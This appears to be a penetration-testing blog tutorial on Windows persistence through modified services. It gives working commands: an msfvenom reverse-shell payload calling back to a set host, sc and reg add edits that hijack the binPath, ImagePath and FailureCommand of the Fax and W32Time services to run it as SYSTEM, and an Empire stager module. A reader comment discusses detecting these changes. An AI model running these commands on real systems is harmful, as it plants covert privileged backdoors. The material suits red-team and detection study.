It is not uncommon for APT Groups to modify an existing service on the compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence. This allows them to hide their malware into a location that will executed under the context of a service. Modification of existing services requires Administrator or SYSTEM level privileges and is not typically used by red teams as a persistence technique. However it is useful during purple team assessments in environments that are less mature in their detection controls to implement this technique as a starting point. There are three locations that can be manipulated by an attacker in order to execute some form of payload:

  1. binPath
  2. ImagePath
  3. FailureCommand

binPath

The “binPath” is the location that points the service to the binary that need to execute when the service is started. Metasploit Framework can be used to generate an arbitrary executable.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=9999 -f exe > pentestlab.exe
Metasploit – Generate Executable

The generated file needs to be dropped to disk which creates a forensic artifact. The “sc” command line utility can control a service and perform actions like start, stop, pause, change the binary path etc. The Fax service is by default not used in Windows 10 installations and therefore is a good candidate for modification of the binary path as it will not interrupt normal user operations.

sc config Fax binPath= "C:\windows\system32\pentestlab.exe"
sc start Fax
Modify Existing Service – binPath

When the service start on the system the payload will executed and a session will open.

Modify Existing Service – binPath Meterpreter

The service can be modified to run automatically during Windows start and with SYSTEM level privileges in order to persist across reboots.

sc config Fax binPath= "C:\Windows\System32\pentestlab.exe" start="auto" obj="LocalSystem"
Modify Existing Service – Start Automatically

ImagePath

Information about each service on the system is stored in the registry. The “ImagePath” registry key typically contains the path of the driver’s image file. Hijacking this key with an arbitrary executable will have as a result the payload to run during service start.

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time" /v ImagePath /t REG_SZ /d "C:\tmp\pentestlab.exe"
Modify Existing Service – ImagePath
Modify Existing Service – ImagePath Meterpreter

FailureCommand

Windows provides a functionality in order to perform certain actions when a service fails to start or it’s correspondence process is terminated. Specifically a command can be executed when a service is killed. The registry key that controls this action is the “FailureCommand” and it’s value will define what will executed.

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time" /v FailureCommand /t REG_SZ /d "C:\tmp\pentestlab.exe"
Modify Existing Service – FailureCommand

Executing the above command will modify the registry key with a malicious executable that will run when the process is killed.

Modify Existing Service – FailureCommand Registry Key

Alternatively the same action can be performed by using the “sc” utility and by specifying the “failure” option.

sc failure Fax command= "\"c:\Windows\system32\pentestlab.exe\""
Modify Existing Service – Failure Parameter

The “Run program” parameter in the Recovery tab of the service will populated by the arbitrary payload. It should be noted that the “First failure” option should be set to “Run a Program” and the other options to “Take No Action“.

Modify Existing Service – Recovery Action

When the associated process is killed the payload will executed with the same privileges as the service and a Meterpreter session will open.

Modify Existing Service – Failure State Meterpreter

When the “Fax” service starts initiates the process “svchost” (PID 2624). Since this process has the role of the trigger terminating the process will create a new arbitrary process which can be easily detected by the blue team.

Modify Existing Service – Kill Process

Empire

Empire has also capability to perform modifications of services as part of their privilege escalation module. However if Empire is used as a C2 into the campaign and the agent is running with elevated privileges (Administrator, SYSTEM) then the following module can be used to modify an existing service that will execute a launcher.

usemodule privesc/powerup/service_stager
Modify Existing Service – Empire

References

1 Comment

  1. Great stuff! Sc.exe usage across enterprise environments are common but image path / bin path changes are rare and cluster around a few common command lines and recognizable product names. It won’t take much effort to add these detections to a periodic sweep of the environment.

Leave a Reply to Jeff Cancel reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s